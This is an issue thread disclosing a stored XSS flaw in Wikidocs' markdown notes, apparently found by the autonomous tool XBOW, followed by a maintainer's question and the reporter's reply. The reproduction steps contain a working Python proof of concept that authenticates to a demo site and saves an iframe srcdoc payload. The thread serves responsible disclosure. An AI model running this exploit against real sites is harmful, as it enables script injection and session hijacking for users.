XBOW Security Report -

[niemand-sec]

Describe your issue

Disclaimer

This vulnerability was detected using XBOW, a system that autonomously finds and exploits potential security vulnerabilities. The finding has been thoroughly reviewed and validated by a security researcher before submission. While XBOW is intended to work autonomously, during its development human experts ensure the accuracy and relevance of its reports.

Description

A stored Cross-Site Scripting (XSS) vulnerability was identified in the markdown notes functionality of the application. By injecting an iframe html element containing embedded JavaScript, an attacker can execute arbitrary JavaScript in the context of the victim's browser upon viewing the uploaded image.

Mitigations

• Avoid reflecting user-defined HTML or JavaScript code in pages.
• If possible, configure proper CSP headers so even if an attacker is able to inject JS code in a page it will not be able to execute.

Impact

• Session Hijacking: Attackers can steal session cookies, allowing them to impersonate legitimate users.
• Data Theft: Access to sensitive information such as personal data, credentials, or financial details.

Device and settings

Wikidocs

Steps to reproduce

1. Execute the following python code to create the PoC:

import requests

url = 'https://demo.wikidocs.it/'
session = requests.Session()

# Authenticate
auth_data = {
    'document': 'aa',
    'password': 'demo'
}
session.post(f'{url}/submit.php?act=authentication', data=auth_data)

# Create the XSS payload that worked before
content = '''# Test Page

<iframe srcdoc="<img src=x onerror=alert('XSS')>">
'''

payload = {
    'revision': '0',
    'document': 'xss',
    'content': content
}

r3 = session.post(f'{url}/submit.php?act=content_save', data=payload)
print("Created XSS page at:", f"{url}/xss")

3. Access the malicious page:

• https://demo.wikidocs.it//xss

Screenshots (optional)

No response

Extra fields

• I'd like to work on this issue

[ffiesta]

Hi to all, i know we need to protect wikidocs with some security, ... but in my head wikidocs is like a personal library, wiki faq ... and only has 2 password (1 to read and another to write) normally user only share the read password or don't.

If this is a personal wiki system i think we need to protect very well writing password!

I don't say that we won't protect jpg or javascript or php, ... but @niemand-sec, can you show any security issues in wikidocs without use write password?

• Its more important solve security issues that won't need write password.

[xbow-security]

Hi there @ffiesta / @Zavy86 , sorry for the delayed response.

The two reported issues highlight stored Cross-Site Scripting (XSS) vulnerabilities that can be exploited without write access, especially considering that users might inadvertently introduce vulnerabilities into their personal notes:

• Malicious SVG File Uploads: SVG files, while primarily used for vector graphics, can contain embedded scripts. If a user unknowingly uploads an SVG file with malicious code, it could execute within their browser when viewed. Attackers may leverage this vulnerability to obtain access to the privates notes or the write-privilege account.
• Copy-Pasting Malicious HTML Content: Users may copy content from external sources into their notes without realizing it contains harmful HTML or JavaScript.

Ensuring that uploaded files and pasted content are thoroughly checked for malicious code can significantly enhance the security of the application, protecting users from inadvertently compromising their own data.

Regards